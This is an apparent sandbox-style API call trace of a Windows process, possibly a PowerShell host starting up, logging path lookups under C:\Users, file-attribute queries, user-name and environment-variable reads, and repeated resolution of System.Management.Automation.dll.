[0081.150] SetErrorMode (uMode=0x1) returned 0x1
[0081.150] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x10cdb0 | out: lpFileInformation=0x10cdb0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0081.150] SetErrorMode (uMode=0x1) returned 0x1
[0081.150] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x10cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.150] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x10caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.150] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x10cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.150] SetErrorMode (uMode=0x1) returned 0x1
[0081.151] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x10cdb0 | out: lpFileInformation=0x10cdb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.151] SetErrorMode (uMode=0x1) returned 0x1
[0081.151] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x10cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.151] SetErrorMode (uMode=0x1) returned 0x1
[0081.151] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x10cdb0 | out: lpFileInformation=0x10cdb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.151] SetErrorMode (uMode=0x1) returned 0x1
[0081.151] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x10cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.151] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x10caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.151] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x10cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.151] SetErrorMode (uMode=0x1) returned 0x1
[0081.151] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x10cdb0 | out: lpFileInformation=0x10cdb0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.151] SetErrorMode (uMode=0x1) returned 0x1
[0081.151] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x10cba0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.151] SetErrorMode (uMode=0x1) returned 0x1
[0081.151] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x10cdb0 | out: lpFileInformation=0x10cdb0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.151] SetErrorMode (uMode=0x1) returned 0x1
[0081.151] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x10cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.151] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x10caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.152] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x10cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.152] SetErrorMode (uMode=0x1) returned 0x1
[0081.152] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x10cdf0 | out: lpFileInformation=0x10cdf0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0081.152] SetErrorMode (uMode=0x1) returned 0x1
[0081.152] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x10cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.152] SetErrorMode (uMode=0x1) returned 0x1
[0081.152] GetFileAttributesExW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), fInfoLevelId=0x0, lpFileInformation=0x10cdf0 | out: lpFileInformation=0x10cdf0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2329edc0, ftLastAccessTime.dwHighDateTime=0x1d2f180, ftLastWriteTime.dwLowDateTime=0x2329edc0, ftLastWriteTime.dwHighDateTime=0x1d2f180, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
[0081.152] SetErrorMode (uMode=0x1) returned 0x1
[0081.152] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x105, lpBuffer=0x10cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.152] GetFullPathNameW (in: lpFileName="C:\\Users\\.", nBufferLength=0x105, lpBuffer=0x10cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Users", lpFilePart=0x0) returned 0x8
[0081.152] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x10cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.152] SetErrorMode (uMode=0x1) returned 0x1
[0081.152] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x10cdf0 | out: lpFileInformation=0x10cdf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.152] SetErrorMode (uMode=0x1) returned 0x1
[0081.152] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x10cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.152] SetErrorMode (uMode=0x1) returned 0x1
[0081.153] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz" (normalized: "c:\\users\\aetadzjz"), fInfoLevelId=0x0, lpFileInformation=0x10cdf0 | out: lpFileInformation=0x10cdf0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2329edc0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7d929a80, ftLastAccessTime.dwHighDateTime=0x1d2f182, ftLastWriteTime.dwLowDateTime=0x7d929a80, ftLastWriteTime.dwHighDateTime=0x1d2f182, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.153] SetErrorMode (uMode=0x1) returned 0x1
[0081.153] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x10cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.153] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\.", nBufferLength=0x105, lpBuffer=0x10cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
[0081.153] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x10cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.153] SetErrorMode (uMode=0x1) returned 0x1
[0081.153] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x10cdf0 | out: lpFileInformation=0x10cdf0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.153] SetErrorMode (uMode=0x1) returned 0x1
[0081.153] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x10cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.153] SetErrorMode (uMode=0x1) returned 0x1
[0081.153] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x10cdf0 | out: lpFileInformation=0x10cdf0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.153] SetErrorMode (uMode=0x1) returned 0x1
[0081.153] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x10cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.153] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop\\.", nBufferLength=0x105, lpBuffer=0x10cae0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.154] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop", nBufferLength=0x105, lpBuffer=0x10ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Desktop", lpFilePart=0x0) returned 0x19
[0081.154] SetErrorMode (uMode=0x1) returned 0x1
[0081.154] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Desktop" (normalized: "c:\\users\\aetadzjz\\desktop"), fInfoLevelId=0x0, lpFileInformation=0x10d0b0 | out: lpFileInformation=0x10d0b0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0xd5210210, ftLastAccessTime.dwHighDateTime=0x1d34cee, ftLastWriteTime.dwLowDateTime=0xd5210210, ftLastWriteTime.dwHighDateTime=0x1d34cee, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
[0081.155] SetErrorMode (uMode=0x1) returned 0x1
[0081.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.155] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.156] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.164] CoTaskMemAlloc (cb=0x804) returned 0x1b79db40
[0081.164] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b79db40, nSize=0x10d418 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x10d418) returned 0x1
[0081.164] CoTaskMemFree (pv=0x1b79db40)
[0081.164] CoTaskMemAlloc (cb=0x204) returned 0x1c3c90
[0081.164] GetUserNameW (in: lpBuffer=0x1c3c90, pcbBuffer=0x10d458 | out: lpBuffer="aETAdzjz", pcbBuffer=0x10d458) returned 1
[0081.164] CoTaskMemFree (pv=0x1c3c90)
[0081.165] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dfd7b8*="Available", lpRawData=0x2dfd548) returned 1
[0081.197] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0081.197] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.197] CoTaskMemFree (pv=0x229ec0)
[0081.197] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0081.197] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.197] CoTaskMemFree (pv=0x229ec0)
[0081.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cf20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.198] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.216] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0081.216] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
[0081.216] CoTaskMemFree (pv=0x229ec0)
[0081.216] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0081.216] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
[0081.216] CoTaskMemFree (pv=0x229ec0)
[0081.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.217] GetCurrentProcessId () returned 0x664
[0081.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ce30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
